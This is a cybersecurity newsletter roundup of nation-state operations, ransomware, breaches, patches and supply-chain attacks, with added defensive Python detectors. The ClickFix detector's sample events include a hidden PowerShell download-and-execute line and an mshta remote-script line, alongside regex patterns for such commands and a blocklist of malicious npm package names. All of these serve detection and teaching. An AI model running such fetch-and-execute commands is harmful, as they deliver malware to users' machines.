Weekend Catch-Up: What Mattered in Cybersecurity This Week
Cyber Warfare Goes Kinetic: Nation-State Attacks, Ransomware Surge, and America's Cybersecurity Crisis
Happy Friday, Security Gang!
What a wild week it's been in the cybersecurity world, and honestly, calling it "wild" might be the understatement of the year. We've seen Ukraine hit Russian bombers with drones in an operation it says was prepared by cyber espionage, watched CISA lose a third of its workforce while threats keep multiplying, and seen the Play ransomware gang rack up roughly 900 victims over three years.
If you thought 2024 was intense, buckle up: 2025 is proving that cyber warfare isn't just about stolen data anymore. It's about real explosions, real casualties, and real geopolitical consequences. From nation-state campaigns reshaping international relations to romance scams run on AI and trafficked workers, this week's stories read like a Tom Clancy novel, except it's all happening right now.
So grab your weekend coffee (Turkish roast Nespresso preferred, naturally), settle in, and let's break down everything that went down this week in the cyber domain.
🌍 Nation-State Cyber Warfare
Ukraine's Strategic Cyber Operations Ukraine's military intelligence executed one of the most ambitious operations of the conflict, launching drone strikes against air bases more than 2,700 miles inside Russian territory. These were not ordinary drone attacks: Ukraine says the strikes knocked out roughly one-third of Russia's long-range bomber fleet, and that cyber espionage beforehand let its operators position and launch the drones undetected. Drawing parallels to historical Mossad operations, it shows how cyber reconnaissance can set the stage for decisive physical strikes in modern warfare.
In a separate but related operation, Ukrainian intelligence (GUR) successfully breached Tupolev, the Russian aerospace and defense company responsible for developing supersonic strategic bombers. The hackers exfiltrated 4.4 gigabytes of classified information, including personnel records, internal management communications, procurement documents, engineer resumes, and minutes from closed meetings. Most significantly, Ukrainian sources revealed their hackers maintained persistent access to Tupolev's network for an extended period, using this foothold to gather intelligence for future operations against other Russian defense sector organizations. This represents a strategic intelligence coup that could influence future peace negotiations.
Iran's Regional Cyber Campaigns ESET researchers have attributed a new wave of attacks on Kurdish and Iraqi government officials to BladedFeline, assessed to be a subgroup of the well-known Iranian state-sponsored group OilRig. The campaign reflects Iran's broader cyber strategy in Iraq, where Tehran continues to exploit the power vacuum left when Saddam Hussein's regime was overthrown in 2003.
The timing is particularly significant as these attacks target both the Iraqi government—which has been increasingly distancing itself from Iranian influence—and Kurdish officials who have historically maintained strong alliances with American forces. This cyber activity occurs against the backdrop of Iran's significantly weakened regional position following recent losses of influence and proxy forces in Lebanon, Gaza, and Syria.
China's Escalating Taiwan Tensions Chinese authorities escalated their hybrid campaign against Taiwan by publishing a wanted notice, with rewards offered, for twenty Taiwanese individuals it accuses of hacking mainland Chinese systems on behalf of Taiwan's ruling Democratic Progressive Party. Police in Guangzhou claimed the group was led by someone named Ning Naoi but disclosed no specifics about the alleged intrusions, which raises questions about the substance of the charges.
Simultaneously, China imposed a complete ban on all commercial dealings with Sicuens International Company, officially labeling its owners as "hardcore Taiwan independence supporters." This dual approach—combining legal persecution with economic warfare—represents a significant escalation in China's campaign against Taiwan, demonstrating how cyber accusations are being weaponized as part of broader geopolitical strategy.
🔒 Major Breaches & Attacks
ConnectWise ScreenConnect Compromise ConnectWise confirmed a suspected nation-state intrusion affecting a small number of customers of its ScreenConnect remote access platform, specifically cloud-hosted instances. The incident was linked to CVE-2025-3935, an ASP.NET ViewState deserialization flaw that was patched back in April, highlighting the risk carried by unpatched systems. An attacker who obtains a server's ASP.NET machine keys can forge ViewState payloads that the server deserializes, yielding remote code execution and broad access to the environment behind it.
What's particularly concerning is ConnectWise's limited transparency about the incident details, prompting widespread criticism from the cybersecurity community about their preparedness and communication strategy. Given that ScreenConnect is widely used by Managed Service Providers (MSPs) and IT management teams, this breach could have significant downstream impacts on thousands of organizations that rely on these tools for remote system administration.
Ransomware Surge Across Sectors Federal authorities issued an updated advisory revealing that the Play ransomware gang was among the most active ransomware operations of 2024, with approximately 900 victims as of May 2025, three years after it first appeared. The FBI, CISA, and the Australian Cyber Security Centre updated their joint advisory to include tactics, techniques, and procedures observed in recent attacks.
Initial access brokers working with Play have been exploiting three vulnerabilities in SimpleHelp remote monitoring and management software (CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728). Chained together, they let an attacker read files off the server, escalate privileges, and execute arbitrary code. The group also works hard at evasion: it recompiles the ransomware binary for every attack, so each victim sees a unique file hash and signature-based detection never gets a second chance, and it handles negotiations from unique email addresses on the GMX.de and web.de domains. Some victims have reported receiving phone calls as part of the extortion, showing how these criminals combine digital and old-fashioned pressure tactics.
Lee Enterprises, the newspaper publisher, completed its forensic investigation into a ransomware attack that exposed personal information belonging to 39,779 individuals, including Social Security numbers. The Qilin ransomware gang claimed responsibility, saying it stole 350 gigabytes of data and threatening to leak it unless a ransom was paid. The company is offering affected individuals twelve months of free credit monitoring and identity protection while investigators continue to watch dark web marketplaces for the stolen data.
Municipal & Healthcare Attacks A wave of ransomware attacks has devastated municipal services across multiple states. Durant, Oklahoma saw ransomware take down both city systems and the police department's network, though emergency services remained functional. Lorain County, Ohio experienced a more severe impact, with courts and public services knocked offline, affecting over 315,000 residents. In Puerto Rico, a cyberattack against the Department of Justice forced the suspension of criminal background check services, creating significant delays in legal proceedings.
These incidents highlight the chronic under-resourcing of municipal IT infrastructure and the dangerous lack of network segmentation that continues to plague many government systems. The attacks demonstrate how cybercriminals are increasingly targeting local governments, knowing they often lack robust cybersecurity defenses and backup systems.
Covenant Health confirmed a cyberattack disrupted data access at three hospitals in Maine and New Hampshire, including St. Joseph and St. Mary's. While IT systems remain offline, clinical care continues using manual processes. This mirrors patterns seen in operational technology (OT) networks in the energy sector, where operations can persist despite data loss, though patient outcomes may be hindered by the lack of access to historical medical information. Surgeries and emergency treatments remain functional, while elective procedures have been delayed.
Retail & Financial Breaches Iconic French jeweler Cartier disclosed a data breach involving names, email addresses, and countries of residence of select clients. While the company emphasized that no passwords, financial data, or sensitive payment details were exposed, this attack follows a concerning string of retailer breaches affecting major brands like Adidas, Victoria's Secret, and Marks & Spencer, highlighting a troubling trend of cybercriminals specifically targeting consumer brands and their customer databases.
Main Street Bank reported a cyberattack via a third-party vendor that exposed personal data for roughly 5% of its customers. While the incident didn't materially impact bank operations, the institution immediately ceased all activities with the compromised provider. Details remain deliberately vague—it's unclear whether the contract termination is permanent or if the bank is conducting a thorough security review before resuming the relationship. This incident occurs amid increasing regulatory scrutiny on supply chain risks in the financial sector.
The North Face, owned by VF Corporation (which also owns Vans and Timberland), confirmed a credential stuffing attack that exposed user data including full names, birthdates, email addresses, phone numbers, and purchase histories. No passwords or payment information were taken. Credential stuffing needs no vulnerability at all, only username and password pairs leaked from other sites, so the incident underscores the importance of multi-factor authentication for retail accounts, along with login rate limiting, bot detection, and checking submitted passwords against known-breach lists.
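Credential stuffing has a recognizable shape in authentication logs, and it is worth showing rather than just naming. The detector below is an added example written for this newsletter, not code from any of the companies mentioned; the log format, the sample lines, and the thresholds are all constructed assumptions. It separates a stuffing source (many distinct accounts, almost all failures) from a brute-force source (one account hammered) and from a busy office NAT (many accounts, mostly successes), and it reports which accounts actually logged in from the bad source, since those are the ones to reset and enroll in MFA.

```python
"""Credential-stuffing detection over authentication logs.

Credential stuffing looks different from brute force: one source tries
MANY distinct accounts, each only once or twice, and most attempts fail
because the reused passwords are wrong for this site.  Brute force is one
account, many attempts; a busy office NAT is many accounts, mostly
successes.  The detector keys on that signature.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not from any real incident).  The line format is
# an assumption made for this example; adapt LINE_RE to your own logs.
SAMPLE_LOG = """\
2025-06-06T10:00:01Z ip=203.0.113.7 user=alice@example.com result=FAIL
2025-06-06T10:00:02Z ip=203.0.113.7 user=bob@example.com result=FAIL
2025-06-06T10:00:03Z ip=203.0.113.7 user=carol@example.com result=OK
2025-06-06T10:00:04Z ip=203.0.113.7 user=dave@example.com result=FAIL
2025-06-06T10:00:05Z ip=203.0.113.7 user=erin@example.com result=FAIL
2025-06-06T10:00:06Z ip=203.0.113.7 user=frank@example.com result=FAIL
2025-06-06T10:00:07Z ip=203.0.113.7 user=grace@example.com result=FAIL
2025-06-06T10:00:08Z ip=203.0.113.7 user=heidi@example.com result=FAIL
2025-06-06T10:00:09Z ip=203.0.113.7 user=ivan@example.com result=FAIL
2025-06-06T10:00:10Z ip=203.0.113.7 user=judy@example.com result=FAIL
2025-06-06T10:01:00Z ip=198.51.100.20 user=pat@example.com result=OK
2025-06-06T10:01:05Z ip=198.51.100.20 user=sam@example.com result=OK
2025-06-06T10:01:09Z ip=198.51.100.20 user=lee@example.com result=OK
2025-06-06T10:01:12Z ip=198.51.100.20 user=kim@example.com result=OK
2025-06-06T10:01:20Z ip=198.51.100.20 user=max@example.com result=OK
2025-06-06T10:01:30Z ip=198.51.100.20 user=ann@example.com result=FAIL
2025-06-06T10:02:00Z ip=192.0.2.9 user=admin@example.com result=FAIL
2025-06-06T10:02:01Z ip=192.0.2.9 user=admin@example.com result=FAIL
2025-06-06T10:02:02Z ip=192.0.2.9 user=admin@example.com result=FAIL
2025-06-06T10:02:03Z ip=192.0.2.9 user=admin@example.com result=FAIL
2025-06-06T10:02:04Z ip=192.0.2.9 user=admin@example.com result=FAIL
2025-06-06T10:02:05Z ip=192.0.2.9 user=admin@example.com result=FAIL
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)


def parse_events(text):
    """Turn log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"].replace("Z", "+00:00")),
            "ip": m["ip"],
            "user": m["user"],
            "ok": m["result"] == "OK",
        })
    return events


def detect_credential_stuffing(events, window=timedelta(minutes=10),
                               min_users=5, max_success_ratio=0.2):
    """Return {ip: finding} for sources that, within any `window`, hit at
    least `min_users` distinct accounts with a success ratio at or below
    `max_success_ratio`.  The finding lists accounts that DID log in from
    that source: those are the ones to force a reset and MFA on."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until the span fits
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            win = evs[start:end + 1]
            users = {e["user"] for e in win}
            if len(users) < min_users:
                continue
            successes = sorted({e["user"] for e in win if e["ok"]})
            ratio = sum(e["ok"] for e in win) / len(win)
            if ratio > max_success_ratio:
                continue
            finding = {
                "attempts": len(win),
                "distinct_users": len(users),
                "success_ratio": round(ratio, 2),
                "compromised": successes,
            }
            # keep the widest qualifying window seen for this source
            if ip not in findings or finding["attempts"] > findings[ip]["attempts"]:
                findings[ip] = finding
    return findings


if __name__ == "__main__":
    for ip, f in detect_credential_stuffing(parse_events(SAMPLE_LOG)).items():
        print(ip, f)
```

Tune `min_users` and `max_success_ratio` to your own baseline; a consumer site behind carrier-grade NAT will need a higher `min_users` than an employee portal, and the window should be at least as long as the attacker's observed pacing, since well-run stuffing tools throttle to stay under naive per-minute limits.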
🏛️ Government & Regulatory
CISA Workforce Crisis A deeply concerning development has emerged regarding the Cybersecurity and Infrastructure Security Agency (CISA), which has lost approximately 1,000 employees—nearly one-third of its workforce—reducing total staff to around 2,200 through a combination of buyouts, early retirements, and layoffs. More than 600 employees departed in the most recent round as part of the Department of Homeland Security's workforce transition program, with insider sources suggesting the actual number approaches 700.
This reduction doesn't even include private contractors who ceased working for CISA following abrupt contract cancellations. The podcast host expressed serious concerns about the apparent lack of strategic direction from the current administration regarding CISA's future, emphasizing that cybersecurity requires highly specialized personnel and cannot operate as a lean organization given the rapidly escalating threat landscape. This workforce reduction comes at a time when cyber threats are more sophisticated and frequent than ever before.
Australia's Ransomware Reporting Law Australia has implemented a groundbreaking ransomware reporting requirement: victims must report any ransom payment within 72 hours to the Australian Signals Directorate. The obligation currently applies to entities with annual turnover above AU$3 million (roughly US$1.9 million) and is set to expand to many more organizations. Non-compliance carries a civil penalty of up to 60 penalty units.
This legislative move addresses a critical intelligence gap—previously, only 1 in 5 ransomware incidents were reported to authorities, severely limiting government understanding of the threat landscape. While this seeks to improve threat visibility and enable better coordinated responses, the efficacy and administrative burden on businesses remain subjects of ongoing debate in the cybersecurity community.
UK's Cyber War Strategy The UK's Strategic Defence Review has unveiled plans to integrate offensive cyber capabilities across all military branches, working closely with the intelligence agencies MI5, MI6, and GCHQ. This is a significant shift in British defence policy, with the country publicly acknowledging its move toward active digital warfare operations.
This breaks from past norms of secrecy around cyber operations and signals that the UK views cyberspace as a legitimate domain for military action. The integration across traditional military branches suggests a recognition that future conflicts will be inherently hybrid, combining conventional military operations with sophisticated cyber attacks.
🛡️ Security Developments
Zero-Day Patches Released Google has issued security updates across multiple platforms. For Android, the June bulletin patched over 30 vulnerabilities, including CVE-2025-26443, a local privilege escalation flaw that needs no user interaction, which makes it well suited to automated exploitation chains. For Chrome, Google issued an emergency update for CVE-2025-5419, an out-of-bounds read and write in the V8 JavaScript engine that is being actively exploited in the wild. The patch is available on all desktop platforms, and users should update Chrome immediately.
Qualcomm disclosed three zero-day vulnerabilities in its Adreno GPU drivers, affecting dozens of different chipsets used in smartphones and tablets worldwide. Two of these flaws can cause memory corruption through unauthorized GPU commands, while the third, CVE-2025-27038, involves a use-after-free error that could lead to arbitrary code execution. All issues have been patched, but users need to check for OEM firmware updates, which may take weeks or months to become available depending on their device manufacturer.
Law Enforcement Victories In a rare win against the cybercrime supply chain, Dutch and US authorities, with international support, dismantled AVCheck, one of the largest counter-antivirus services criminals used to test malware against detection engines before deploying it. The action, part of Operation Endgame, seized servers and databases that revealed email addresses linked to known ransomware gangs and other criminal groups.
While security experts acknowledge that another similar tool will likely emerge to replace AVcheck, this takedown represents a significant disruption to the malware development pipeline, potentially forcing criminals to deploy less-tested malware or seek alternative testing methods.
The Department of Justice successfully seized the BidenCash cybercrime marketplace, taking offline approximately 145 dark web and clear web domains. Despite being operational for less than a year, BidenCash became one of the top carding platforms after publishing 3.3 million stolen credit cards for free in February 2023 as a promotional strategy to attract customers. The marketplace served over 117,000 customers and facilitated the trade of more than 15 million payment card numbers, generating $17 million in revenue before its takedown.
Supply Chain Threats Security researchers have uncovered a wave of malicious packages distributed through popular registries including npm, PyPI, and RubyGems. The packages are designed to drain cryptocurrency wallets, delete entire codebases, and exfiltrate sensitive API tokens, including Telegram API credentials.
Particularly concerning is that Socket noted the malicious Ruby gems were published by a threat actor using aliases Bùi nam, buidanhnam, and si_mobile—just days after Vietnam ordered a nationwide ban on the Telegram messaging app for allegedly failing to cooperate with government efforts to tackle fraud, drug trafficking, and terrorism.
Another set of malicious npm packages (pancake_uniswap_validators_utils_snipe, pancakeswap-oracle-prediction, ethereum-smart-contract, and env-process) was engineered to siphon 80 to 85 percent of the funds in a victim's Ethereum or Binance Smart Chain wallet using obfuscated JavaScript. These libraries were downloaded hundreds of thousands of times, a reminder of the danger of pulling in unvetted open-source dependencies.
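What "package integrity verification" means in practice for npm: check the fetched tarball against the lockfile's SRI hash, and refuse to install anything whose name is on a blocklist or that declares an install hook nobody has reviewed. The script below is an added example for this write-up, not Socket's tooling or npm's own code. The blocklist holds the four package names reported above, while the lockfile, the manifests, and the tarball bytes are constructed for the demonstration. It also serves the open-source dependency item in the action list at the end of this issue.

```python
"""Pre-install audit of an npm lockfile: pin verification, known-bad names,
and lifecycle hooks.  npm records each dependency's tarball hash as an SRI
string ("sha512-<base64>") in package-lock.json; verifying the downloaded
tarball against it is what stops a swapped or tampered artifact.  The audit
then flags the two things wallet-drainer packages rely on: a name nobody
vetted, and a preinstall/postinstall hook that runs as soon as `npm install`
unpacks it.
"""
import base64
import hashlib
import hmac

# Names reported in the campaign described above; extend from your own feeds.
KNOWN_MALICIOUS = {
    "pancake_uniswap_validators_utils_snipe",
    "pancakeswap-oracle-prediction",
    "ethereum-smart-contract",
    "env-process",
}
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def sri_of(tarball: bytes, algo: str = "sha512") -> str:
    """Compute the Subresource Integrity string npm stores for a tarball."""
    digest = hashlib.new(algo, tarball).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def verify_tarball(tarball: bytes, expected: str) -> bool:
    """Constant-time check of a tarball against a lockfile `integrity` value."""
    algo, sep, b64 = expected.partition("-")
    if sep == "" or algo not in hashlib.algorithms_available:
        return False
    actual = base64.b64encode(hashlib.new(algo, tarball).digest())
    return hmac.compare_digest(actual, b64.encode())


def audit_lockfile(lock: dict, manifests: dict) -> list:
    """Walk a lockfileVersion 2/3 `packages` map and return findings.
    `manifests` maps package name -> its package.json dict (as read from the
    fetched tarball) and is used to spot lifecycle hooks."""
    findings = []
    for path, entry in lock.get("packages", {}).items():
        if path == "":            # the root project itself
            continue
        name = entry.get("name") or path.rsplit("node_modules/", 1)[-1]
        reasons = []
        if name in KNOWN_MALICIOUS:
            reasons.append("known-malicious")
        if not entry.get("integrity"):
            reasons.append("missing-integrity")    # nothing to verify against
        resolved = entry.get("resolved", "")
        if resolved and not resolved.startswith("https://"):
            reasons.append("insecure-resolved")    # http://, git+ssh, etc.
        hooks = [h for h in LIFECYCLE_HOOKS
                 if h in manifests.get(name, {}).get("scripts", {})]
        if hooks:
            reasons.append("lifecycle-script:" + ",".join(hooks))
        if reasons:
            findings.append({"package": name, "version": entry.get("version"),
                             "reasons": reasons})
    return findings


# ---- constructed sample data (not real packages or real tarballs) ----
GOOD_TARBALL = b"fake tarball bytes for tiny-helper 1.0.0"
SAMPLE_LOCK = {
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/tiny-helper": {
            "version": "1.0.0",
            "resolved": "https://registry.npmjs.org/tiny-helper/-/tiny-helper-1.0.0.tgz",
            "integrity": sri_of(GOOD_TARBALL),
        },
        "node_modules/env-process": {
            "version": "2.1.0",
            "resolved": "http://registry.example.org/env-process-2.1.0.tgz",
            "integrity": "sha512-AAAA",
        },
        "node_modules/left-pad-ish": {"version": "0.0.1"},
    },
}
SAMPLE_MANIFESTS = {
    "tiny-helper": {"scripts": {"test": "node test.js"}},
    "env-process": {"scripts": {"postinstall": "node ./setup.js"}},
    "left-pad-ish": {},
}

if __name__ == "__main__":
    pinned = SAMPLE_LOCK["packages"]["node_modules/tiny-helper"]["integrity"]
    print("good tarball verifies:", verify_tarball(GOOD_TARBALL, pinned))
    print("tampered tarball verifies:", verify_tarball(GOOD_TARBALL + b"\x00", pinned))
    for finding in audit_lockfile(SAMPLE_LOCK, SAMPLE_MANIFESTS):
        print(finding)
```

In a real pipeline the manifests come from the tarballs you just verified, never from the registry metadata endpoint, because a publisher can make the two disagree. Running the audit with `npm ci --ignore-scripts` as the install step turns a "lifecycle-script" finding into a review gate rather than a fait accompli.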
Hewlett Packard Enterprise disclosed eight vulnerabilities in its StoreOnce backup platform, the most severe a critical authentication bypass rated CVSS 9.8. The set also includes remote code execution flaws, server-side request forgery, directory traversal, and information disclosure issues. Backup systems are what you recover from after ransomware, which makes an appliance like this an especially attractive target, and it should never be reachable from the general user network, let alone the internet. Administrators are urged to upgrade to version 4.3.11 immediately.
🎯 Sophisticated Attack Techniques
Phishing Evolution A sophisticated spear phishing campaign has emerged that impersonates Rothschild & Co recruiters to specifically target Chief Financial Officers using NetBird, a legitimate remote access tool. Victims receive carefully crafted phishing emails that redirect to Firebase-hosted pages utilizing encrypted CAPTCHAs, ultimately delivering remote access payloads to victim systems.
What makes this campaign particularly dangerous is that the attackers bypass traditional defenses by riding on legitimate remote monitoring and management (RMM) platforms, including ConnectWise, LogMeIn, and Splashtop. This is a significant evolution beyond basic email lures, showing how threat actors are adapting to use trusted business tools as attack vectors.
The spread of ClickFix attacks is another worrying evolution in social engineering. A fake verification page, often a counterfeit Cloudflare "humanness check" that closely mimics the legitimate Turnstile widget, tells the victim to prove they are human by pressing Win+R, pasting a command the page has already placed on the clipboard, and hitting Enter; that command downloads and runs the malware. The technique weaponizes security prompts users have been trained to trust and exploits how habituated they have become to verification steps, and because the victim runs the command themselves, email and web filters never see a malicious attachment.
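ClickFix leaves a distinctive trace on the endpoint: a script host started by explorer.exe (the Run dialog) with a command line that fetches remote content and often still carries the decoy "I am not a robot" comment the victim pasted. The detector below is an added example written for this newsletter, not from any vendor's ruleset; the event records are constructed, Sysmon-like process-creation events with field names chosen for the example, and the indicator list is a starting point rather than an exhaustive one.

```python
"""Endpoint detection for the ClickFix pattern: a script host launched from
the user's shell (explorer.exe, i.e. the Win+R Run box) with a command line
that fetches and runs remote content, frequently dragging along the decoy
"I am not a robot" comment the lure page told the victim to paste.
"""
import re

INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Each indicator: (label, compiled regex).  Labels surface in the finding.
INDICATORS = [
    ("hidden-window",  re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded-cmd",    re.compile(r"-e(?:nc|ncodedcommand)?\s", re.I)),
    ("web-fetch",      re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget)\b", re.I)),
    ("invoke-expr",    re.compile(r"\|\s*iex\b|invoke-expression", re.I)),
    ("mshta-url",      re.compile(r"mshta(?:\.exe)?\s+['\"]?https?://", re.I)),
    ("base64-decode",  re.compile(r"frombase64string", re.I)),
    ("decoy-comment",  re.compile(r"not a robot|captcha|verification id", re.I)),
]


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict):
    """Return a finding dict for a suspicious process-creation event, else None."""
    parent = _basename(event.get("parent_image", ""))
    image = _basename(event.get("image", ""))
    if parent not in INTERACTIVE_PARENTS or image not in SCRIPT_HOSTS:
        return None
    cmd = event.get("command_line", "")
    hits = [label for label, rx in INDICATORS if rx.search(cmd)]
    if not hits:
        return None
    # Decoy text, mshta pulling a URL, or fetch-then-execute is the
    # high-confidence combination; a lone indicator is worth a look, not a page.
    high = ("decoy-comment" in hits or "mshta-url" in hits or
            ("web-fetch" in hits and ("invoke-expr" in hits or "hidden-window" in hits)))
    return {"image": image, "severity": "high" if high else "medium",
            "indicators": hits, "command_line": cmd}


def detect(events):
    """Classify a batch of events and keep only the findings."""
    return [f for f in (classify(e) for e in events) if f]


# Constructed process-creation events (Sysmon Event ID 1 shaped; the field
# names are this example's own, not a vendor schema).
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iwr http://203.0.113.5/a.txt | iex" '
                     '# I am not a robot - reCAPTCHA Verification ID: 4591'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://198.51.100.9/verify.hta"},
    {"parent_image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -ExecutionPolicy Bypass -File .\\build.ps1"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c dir C:\\Users\\jdoe\\Downloads"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["severity"], f["image"], f["indicators"])
```

The parent-process condition is what keeps this quiet on developer machines: the same PowerShell one-liner launched from a terminal, an IDE, or a scheduled task is not a ClickFix event, while explorer.exe spawning a hidden PowerShell that pipes a download into `iex` almost always is. Pair the rule with an audit of the Windows RunMRU registry key, which keeps the text the user pasted into the Run box.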
Google's Salesforce Vishing Warning Google's Threat Intelligence Group has identified a financially motivated cluster, tracked as UNC6040 and linked to the loosely organized criminal community known as "The Com", that talks companies into handing over broad access to their Salesforce instances. The callers impersonate IT support and walk employees through authorizing a modified connected app disguised as Salesforce's legitimate Data Loader tool; no Salesforce vulnerability is involved.
The campaign has hit approximately twenty organizations and remains active. Once the app is authorized, the criminals use it to bulk-export sensitive customer and business data from Salesforce and pivot into the victims' other cloud services and internal networks, potentially reaching everything from customer databases to financial records. Because the attack rides on a legitimate authorization flow, the defense is administrative: restrict which users can authorize connected apps, allowlist the apps permitted in the org, and alert on unexpected bulk API exports.
Insider Threats The arrest of Nathan Vilas Laatsch, a civilian IT specialist in the Defense Intelligence Agency's Insider Threat Division, highlights the problem of internal risk even inside the most tightly controlled government organizations. Laatsch was arrested for attempting to pass classified information to what he believed was a friendly foreign government (in fact an FBI undercover operation), saying he was motivated by disagreement with the Trump administration's policies.
He offered sensitive documents and intelligence products, exfiltrated data using a thumb drive, and even requested foreign citizenship in exchange for his cooperation. This case is particularly concerning because it demonstrates that even personnel specifically tasked with identifying insider threats can become threats themselves.
The Coinbase breach traced to TaskUs, a US-headquartered outsourcing firm, reveals oversight gaps in international business process outsourcing. A TaskUs agent at the company's operations in India was caught photographing sensitive customer data on behalf of external attackers who had bribed multiple employees. The incident led to an internal investigation and terminations, but not before the attackers had obtained names, email addresses, partial Social Security numbers, transaction histories, and ID document scans for roughly 70,000 Coinbase customers.
🌐 International Developments
UAE Banking Security Enhancement The United Arab Emirates Central Bank has issued a progressive directive requiring all financial institutions to eliminate weak authentication methods—specifically SMS and email-based one-time passwords—from all banking operations by March 26, 2026. This represents one of the most aggressive national moves toward stronger authentication mechanisms globally.
The directive reflects the UAE's push for cybersecurity leadership in the financial sector and recognizes that SMS one-time passwords fall to SIM swapping and SS7 interception, while email OTPs fall with the mailbox. Banks will need to move to app-based authenticators, hardware tokens, or biometrics, with one caveat worth stating: an app-generated code that the user types into a web page is still phishable by a real-time proxy, so only FIDO2 passkeys and hardware security keys bound to the site's origin deliver genuine phishing resistance.
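For readers planning the migration the UAE directive forces, here is what an app-based authenticator actually computes and what the server must do with it. The code is an added example, not from the Central Bank's directive or any bank's implementation. It implements HOTP (RFC 4226) and TOTP (RFC 6238) using the RFC reference secret, and adds the two server-side rules practitioners most often get wrong: a clock-skew window of one step, and refusing to accept a time step that has already been used, which blunts the simplest replay of a phished code.

```python
"""HOTP (RFC 4226) and TOTP (RFC 6238) as used by authenticator apps, plus the
server-side verification rules that matter: constant-time comparison, a small
clock-skew window, and refusal to accept the same time step twice.
"""
import hashlib
import hmac
import struct
import time


def hotp(key: bytes, counter: int, digits: int = 6, digest=hashlib.sha1) -> str:
    """HMAC the 8-byte big-endian counter, dynamically truncate, take `digits`."""
    mac = hmac.new(key, struct.pack(">Q", counter), digest).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(key: bytes, unix_time=None, step: int = 30, digits: int = 6,
         digest=hashlib.sha1) -> str:
    """TOTP is HOTP with the counter set to floor(time / step)."""
    if unix_time is None:
        unix_time = time.time()
    return hotp(key, int(unix_time) // step, digits, digest)


class TotpVerifier:
    """Server side.  Remembers the last accepted time step for this user so a
    code that was phished and replayed seconds later is rejected even though
    it is still inside the validity window."""

    def __init__(self, key: bytes, step: int = 30, digits: int = 6, window: int = 1):
        self.key, self.step, self.digits, self.window = key, step, digits, window
        self.last_accepted = -1

    def verify(self, code: str, unix_time=None) -> bool:
        if unix_time is None:
            unix_time = time.time()
        current = int(unix_time) // self.step
        for delta in range(-self.window, self.window + 1):
            ctr = current + delta
            if ctr <= self.last_accepted:      # already used, or older: replay
                continue
            expected = hotp(self.key, ctr, self.digits)
            if hmac.compare_digest(expected.encode(), code.encode()):
                self.last_accepted = ctr
                return True
        return False


if __name__ == "__main__":
    # RFC 4226 / RFC 6238 reference secret (ASCII "12345678901234567890")
    k = b"12345678901234567890"
    print(hotp(k, 0), totp(k, 59, digits=8))           # 755224 94287082 per the RFCs
    v = TotpVerifier(k)
    c = totp(k, 1111111109)
    print(v.verify(c, 1111111109), v.verify(c, 1111111115))   # True False
```

Persist `last_accepted` per user in the same store as the secret, and rate-limit `verify` calls: a six-digit code with a three-step window gives an online guesser roughly a 3-in-a-million chance per attempt, which is fine at ten attempts an hour and not fine at ten thousand.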
Malaysian Official Compromise Malaysia's Home Minister experienced a significant security breach when his WhatsApp account was compromised and used to distribute phishing links to his contacts. While no victims reported financial losses, the incident follows a troubling pattern of similar attacks on government officials' communication platforms, including compromises of Telegram, Signal, and various social media accounts.
This incident highlights how SIM swapping and mobile-focused phishing remain top attack vectors for targeting high-profile individuals, and demonstrates the national security implications when senior government officials' communication channels are compromised.
German Privacy Enforcement German authorities have imposed a €45 million fine on Vodafone for GDPR violations that included letting third-party sales agents sign customers to fraudulent contracts and running insecure customer authentication on both its web portal and telephone hotline.
The fine breakdown includes €15 million for inadequate oversight of business partners and €30 million for technical security deficiencies. This case serves as a critical example for other organizations about the importance of properly vetting and monitoring business partners, as companies remain liable for GDPR violations committed by their agents and contractors.
📊 Industry Updates
Threat Actor Naming Initiative Microsoft and CrowdStrike are leading an industry-wide initiative to address the chaos caused by having over 1,700 conflicting names for the same threat actor groups. This naming confusion has severely hampered threat intelligence sharing and analysis across the cybersecurity community.
The podcast host playfully suggested a systematic approach: bears for Russian groups, pandas for Chinese actors, and cats for Iranian threats. Regardless of the specific naming convention adopted, this standardization effort represents a much-needed step toward improving clarity and coordination in threat intelligence sharing.
TrickBot Leadership Exposed German authorities have successfully identified Vitaliy Kovalev, a Russian national, as the founder and leader of the notorious TrickBot cybercriminal organization. TrickBot served as a central component in global ransomware campaigns and collaborated closely with other major malware families including Conti, BazarLoader, and numerous other criminal enterprises.
